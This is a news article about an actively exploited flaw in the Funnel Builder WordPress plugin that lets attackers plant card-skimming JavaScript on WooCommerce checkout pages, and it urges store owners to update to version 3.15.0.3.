A significant security vulnerability in the Funnel Builder plugin for WordPress is actively being exploited to compromise WooCommerce checkout pages. By injecting malicious JavaScript, attackers aim to steal sensitive payment data from unsuspecting users. This alarming development has raised concerns among thousands of WooCommerce store owners.
Details of the Vulnerability
The security issue was brought to light by Sansec, a Dutch e-commerce security firm, which detailed the exploitation techniques in a recent report. The vulnerability impacts all versions of the Funnel Builder plugin prior to 3.15.0.3, affecting over 40,000 WooCommerce installations. Despite the absence of an official CVE identifier, the flaw’s potential for harm has prompted urgent action.
This vulnerability allows unauthorized individuals to inject arbitrary JavaScript into every checkout page on the affected stores. In response, FunnelKit, the developers of Funnel Builder, have issued a critical patch in version 3.15.0.3 to address the flaw.
Methods of Exploitation
According to Sansec, attackers exploit this vulnerability by adding fake Google Tag Manager scripts through the plugin’s ‘External Scripts’ setting. These scripts mimic legitimate analytics tags but secretly deploy a payment skimmer. This skimmer captures sensitive information, including credit card numbers, CVVs, and billing addresses, during the checkout process.
The core issue lies in the plugin’s publicly exposed checkout endpoint. Prior versions allowed incoming requests to execute internal methods without verifying the caller’s permissions. This oversight enables attackers to inject harmful code into the plugin’s global settings, affecting all checkout pages.
Preventive Measures and Future Outlook
To mitigate this risk, store owners using the Funnel Builder plugin are urged to update to version 3.15.0.3 immediately. The update includes crucial patches that seal the vulnerability, safeguarding customer data from potential skimming attacks.
As the cybersecurity landscape evolves, maintaining vigilance over plugin security has become paramount. Developers and store owners must prioritize regular updates and security audits to protect against emerging threats.
In conclusion, the swift response to the Funnel Builder vulnerability highlights the ongoing battle against cyber threats in the e-commerce sector. By staying informed and proactive, businesses can better shield themselves and their customers from malicious activities.
